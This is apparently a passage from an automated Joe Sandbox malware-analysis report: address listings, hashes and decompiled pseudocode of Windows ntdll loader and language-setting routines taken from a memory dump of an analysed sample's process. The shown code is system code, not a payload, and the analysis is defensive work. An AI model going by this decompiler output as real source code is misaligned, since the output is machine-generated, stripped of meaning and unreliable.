                                                              0x00a38996
                                                              0x00000000
                                                              0x00a38996
                                                              0x00a3894c
                                                              0x00000000
                                                              0x00a38870
                                                              0x00a3887b
                                                              0x00a3887d
                                                              0x00a3887f
                                                              0x00a38881
                                                              0x00a38884
                                                              0x00a38884
                                                              0x00a38886
                                                              0x00a38889
                                                              0x00a3888c
                                                              0x00a3888e
                                                              0x00a38891
                                                              0x00a38891
                                                              0x00a38898
                                                              0x00000000
                                                              0x00000000
                                                              0x00a3889a
                                                              0x00a3889b
                                                              0x00a3889e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a388a0
                                                              0x00a388a8
                                                              0x00a388b0
                                                              0x00a388b2
                                                              0x00a388d3
                                                              0x00a388d5
                                                              0x00000000
                                                              0x00a388d7
                                                              0x00a388db
                                                              0x00a388dc
                                                              0x00a388e0
                                                              0x00a388e8
                                                              0x00a388ee
                                                              0x00a388f0
                                                              0x00a388f3
                                                              0x00a388fc
                                                              0x00a38901
                                                              0x00a38906
                                                              0x00a3890c
                                                              0x00a3890c
                                                              0x00a3890f
                                                              0x00a38916
                                                              0x00a38917
                                                              0x00a38918
                                                              0x00a38919
                                                              0x00a3891a
                                                              0x00a3891f
                                                              0x00a38921
                                                              0x00a89c52
                                                              0x00a89c55
                                                              0x00a89c5b
                                                              0x00a89cac
                                                              0x00a89cc0
                                                              0x00a89cc0
                                                              0x00a89c55
                                                              0x00a38927
                                                              0x00a38927
                                                              0x00a3892f
                                                              0x00a38933
                                                              0x00000000
                                                              0x00a388f5
                                                              0x00a388f5
                                                              0x00000000
                                                              0x00a388f7
                                                              0x00a388f7
                                                              0x00a388fa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a388fa
                                                              0x00a388f5
                                                              0x00a388f3
                                                              0x00000000
                                                              0x00a388d5
                                                              0x00000000
                                                              0x00a388b2
                                                              0x00a388c9
                                                              0x00000000
                                                              0x00a388c9
                                                              0x00a3887f
                                                              0x00a3886a
                                                              0x00a38857
                                                              0x00a38852
                                                              0x00a388bf
                                                              0x00a388bf
                                                              0x00a387aa
                                                              0x00a387ad
                                                              0x00a387ae
                                                              0x00a387b4
                                                              0x00a387b5
                                                              0x00a387b6
                                                              0x00a387b8
                                                              0x00a387bd
                                                              0x00a387c1
                                                              0x00a387f4
                                                              0x00a387fa
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a387c1
                                                              0x00000000

                                                              Strings
                                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 00A89C18
                                                              • LdrpDoPostSnapWork, xrefs: 00A89C1E
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 00A89C28
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 2994545307-1948996284
                                                              • Opcode ID: d3e2e0ab02628cb1471f05c3d078743c5843de404c1f188b7e2febb8cb413e1c
                                                              • Instruction ID: f587d71d7ef846ea19f0fc5a714cbf5cbd56d1d41e483474efea07b4e7b9f4b5
                                                              • Opcode Fuzzy Hash: d3e2e0ab02628cb1471f05c3d078743c5843de404c1f188b7e2febb8cb413e1c
                                                              • Instruction Fuzzy Hash: B791DE71A0031AEFDB18DF59C881ABAB3B5FF84354FA44169F805AB251DF34AE41CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A37E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 98%
                                                              			E00A37E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00A3CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00A2C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xb15780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00AA5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xb15780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00A47D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A47D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00AA7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00A47D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00A47D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00AA7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00A5A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00A2B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                              0x00a37e4c
                                                              0x00a37e50
                                                              0x00a37e55
                                                              0x00a37e58
                                                              0x00a37e5d
                                                              0x00a37e71
                                                              0x00a37f33
                                                              0x00a37e77
                                                              0x00a37e77
                                                              0x00a37e79
                                                              0x00a37e79
                                                              0x00a37e7e
                                                              0x00a37f45
                                                              0x00a89848
                                                              0x00000000
                                                              0x00a89848
                                                              0x00a37f4e
                                                              0x00a37f53
                                                              0x00a37f5a
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8985a
                                                              0x00a89862
                                                              0x00a89866
                                                              0x00000000
                                                              0x00a8986c
                                                              0x00000000
                                                              0x00a8986c
                                                              0x00a37e84
                                                              0x00a37e84
                                                              0x00a37e8d
                                                              0x00a89871
                                                              0x00a37eb8
                                                              0x00a37ec0
                                                              0x00a37ec0
                                                              0x00a37e9a
                                                              0x00a8987e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a89884
                                                              0x00a8988b
                                                              0x00a898a7
                                                              0x00a898ac
                                                              0x00a898b1
                                                              0x00a898b6
                                                              0x00a898b8
                                                              0x00a898b8
                                                              0x00a898b9
                                                              0x00000000
                                                              0x00a898b9
                                                              0x00a37ea0
                                                              0x00a37ea7
                                                              0x00000000
                                                              0x00000000
                                                              0x00a37eac
                                                              0x00a37eb1
                                                              0x00a37ec6
                                                              0x00a37ed0
                                                              0x00a898cc
                                                              0x00a37ed6
                                                              0x00a37ed6
                                                              0x00a37ed6
                                                              0x00a37ede
                                                              0x00a37ee3
                                                              0x00a898e3
                                                              0x00a898f0
                                                              0x00a89902
                                                              0x00a898f2
                                                              0x00a898fb
                                                              0x00a898fb
                                                              0x00a89907
                                                              0x00a8991d
                                                              0x00a8991d
                                                              0x00a89907
                                                              0x00a898e3
                                                              0x00a37ef0
                                                              0x00a37f14
                                                              0x00a37f14
                                                              0x00a37f1e
                                                              0x00a89946
                                                              0x00a37f24
                                                              0x00a37f24
                                                              0x00a37f24
                                                              0x00a37f2c
                                                              0x00a8996a
                                                              0x00a89975
                                                              0x00a89975
                                                              0x00a8997e
                                                              0x00a89993
                                                              0x00a89993
                                                              0x00a8997e
                                                              0x00000000
                                                              0x00a37ef2
                                                              0x00a37efc
                                                              0x00a37f0a
                                                              0x00a37f0e
                                                              0x00a89933
                                                              0x00000000
                                                              0x00a89933
                                                              0x00000000
                                                              0x00a37f0e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a37eb1

                                                              Strings
                                                              • LdrpCompleteMapModule, xrefs: 00A89898
                                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 00A89891
                                                              • minkernel\ntdll\ldrmap.c, xrefs: 00A898A2
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                              • API String ID: 0-1676968949
                                                              • Opcode ID: 1daa7384157cad6cf2d08cd49b9e452f3620b0b022ece5555bdfc4130a37f55d
                                                              • Instruction ID: 67e2b9a331ef928ada9d8266945ac16169edd5ebaaa6de4a71c1c57eb11e2cd2
                                                              • Opcode Fuzzy Hash: 1daa7384157cad6cf2d08cd49b9e452f3620b0b022ece5555bdfc4130a37f55d
                                                              • Instruction Fuzzy Hash: 6C5101B1A087459BEB32DB68C944B6E7BE4BF41710F2806A9F8519B7E1D730ED00DB51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A2E620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 93%
                                                              			E00A2E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E00A2F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E00A695D0();
						}
						if(_t78 != 0) {
							L00A477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E00A6FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E00A6BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E00A69600();
					if(_t97 < 0) {
						goto L6;
					}
					E00A6BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L00A2F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E00A6BB40(_t83, _t102 + 0x24, _t78);
								if(L00A343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E00A6BB40(_t84, _t102 + 0x24, _t94);
									if(L00A343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}































                                                              0x00a2e620
                                                              0x00a2e628
                                                              0x00a2e62f
                                                              0x00a2e631
                                                              0x00a2e635
                                                              0x00a2e637
                                                              0x00a2e63e
                                                              0x00a85503
                                                              0x00a85503
                                                              0x00a2e64c
                                                              0x00a2e64c
                                                              0x00a2e651
                                                              0x00000000
                                                              0x00000000
                                                              0x00a2e661
                                                              0x00a2e665
                                                              0x00a8542a
                                                              0x00a2e715
                                                              0x00a2e71a
                                                              0x00a2e71c
                                                              0x00a2e720
                                                              0x00a2e720
                                                              0x00a2e727
                                                              0x00a2e736
                                                              0x00a2e736
                                                              0x00a2e743
                                                              0x00a2e743
                                                              0x00a2e673
                                                              0x00a2e678
                                                              0x00a2e67d
                                                              0x00a2e682
                                                              0x00a2e685
                                                              0x00a2e692
                                                              0x00a2e69b
                                                              0x00a2e6a3
                                                              0x00a2e6ad
                                                              0x00a2e6b1
                                                              0x00a2e6b2
                                                              0x00a2e6bb
                                                              0x00a2e6bf
                                                              0x00a2e6c0
                                                              0x00a2e6c8
                                                              0x00a2e6cc
                                                              0x00a2e6d5
                                                              0x00a2e6d9
                                                              0x00000000
                                                              0x00000000
                                                              0x00a2e6e5
                                                              0x00a2e6ea
                                                              0x00a2e6f9
                                                              0x00a2e70b
                                                              0x00a2e70f
                                                              0x00a85439
                                                              0x00a8545e
                                                              0x00a8545e
                                                              0x00000000
                                                              0x00a8545e
                                                              0x00a8543b
                                                              0x00a8543e
                                                              0x00a85440
                                                              0x00a85445
                                                              0x00a85472
                                                              0x00a85475
                                                              0x00a8548d
                                                              0x00a85493
                                                              0x00a854a9
                                                              0x00000000
                                                              0x00000000
                                                              0x00a854ab
                                                              0x00a854b4
                                                              0x00a854bc
                                                              0x00a854c8
                                                              0x00a854de
                                                              0x00a854fb
                                                              0x00a854e0
                                                              0x00a854e6
                                                              0x00a854eb
                                                              0x00a854eb
                                                              0x00a854de
                                                              0x00000000
                                                              0x00a854bc
                                                              0x00a85477
                                                              0x00a8547a
                                                              0x00a85480
                                                              0x00a85483
                                                              0x00a85486
                                                              0x00a8548b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8548b
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a85447
                                                              0x00a85447
                                                              0x00a85447
                                                              0x00a85447
                                                              0x00a8544e
                                                              0x00000000
                                                              0x00000000
                                                              0x00a85450
                                                              0x00a85452
                                                              0x00a85455
                                                              0x00a8545a
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00a8545c
                                                              0x00a8546a
                                                              0x00a8546d
                                                              0x00a8546f
                                                              0x00000000
                                                              0x00a8546f
                                                              0x00a2e70f

                                                              Strings
                                                              • InstallLanguageFallback, xrefs: 00A2E6DB
                                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00A2E68C
                                                              • @, xrefs: 00A2E6C0
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.357525357.0000000000A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A00000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_a00000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                                              • API String ID: 0-1757540487
                                                              • Opcode ID: 60d8e649dcf64da9f0c38799be67250813b1d73051ad727edd5d33572080ea71
                                                              • Instruction ID: 1125b72afe3562099d6bf4142cc46a171f63f699bb3251c29c472dae66b1d1ae
                                                              • Opcode Fuzzy Hash: 60d8e649dcf64da9f0c38799be67250813b1d73051ad727edd5d33572080ea71
                                                              • Instruction Fuzzy Hash: 06518CB69083559BC714EF68D440AABB3E9BF88714F05092EF985DB240FB34DD8487A2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00A5FAB0 Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 80%
                                                              			E00A5FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E00A3EEF0(0xb17b60);
					_t134 =  *0xb17b84; // 0x77e17b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0xb17b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0xb17b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E00A36D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E00A376E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E00AC8938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E00A2B150();
													}
													_t116 = E00AC6D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E00A375CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0xb18638; // 0x0
																	_t122 = L00A338A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E00A376E2(_t154);
																			goto L41;
																		}
																	} else {
																		E00A376E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L00A5FCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L00A370F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E00A5FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E00A5FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E00A5FD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E00A5FD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E00A5FD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0xb17b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0xb17b84 = _t75;
						_t73 = E00A3EB70(_t134, 0xb17b60);
						if( *0xb17b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E00A3FF60( *0xb17b20);
							}
						}
						goto L5;
					}
				}
			}

















































                                                              0x00a5fab0
                                                              0x00a5fab2
                                                              0x00a5fab3
                                                              0x00a5fab4
                                                              0x00a5fabc
                                                              0x00a5fac0
                                                              0x00a5fb14
                                                              0x00a5fb17
                                                              0x00a5fac2
                                                              0x00a5fac8
                                                              0x00a5facd
                                                              0x00a5fad3
                                                              0x00a5fad3
                                                              0x00a5fadd
                                                              0x00a5fb18
                                                              0x00a5fb1b
                                                              0x00a5fb1d
                                                              0x00a5fb1e
                                                              0x00a5fb1f
                                                              0x00a5fb20
                                                              0x00a5fb21
                                                              0x00a5fb22
                                                              0x00a5fb23
                                                              0x00a5fb24
                                                              0x00a5fb25
                                                              0x00a5fb26
                                                              0x00a5fb27
                                                              0x00a5fb28
                                                              0x00a5fb29
                                                              0x00a5fb2a
                                                              0x00a5fb2b
                                                              0x00a5fb2c
                                                              0x00a5fb2d
                                                              0x00a5fb2e
                                                              0x00a5fb2f
                                                              0x00a5fb3a
                                                              0x00a5fb3b
                                                              0x00a5fb3e
                                                              0x00a5fb41
                                                              0x00a5fb44
                                                              0x00a5fb47
                                                              0x00a5fb4a
                                                              0x00a5fb4d
                                                              0x00a5fb53
                                                              0x00a9bdcb
                                                              0x00a9bdcb
                                                              0x00a5fb59
                                                              0x00a5fb5b
                                                              0x00a5fb5b
                                                              0x00a5fb5e
                                                              0x00a9bdd5
                                                              0x00a9bdd8
                                                              0x00000000
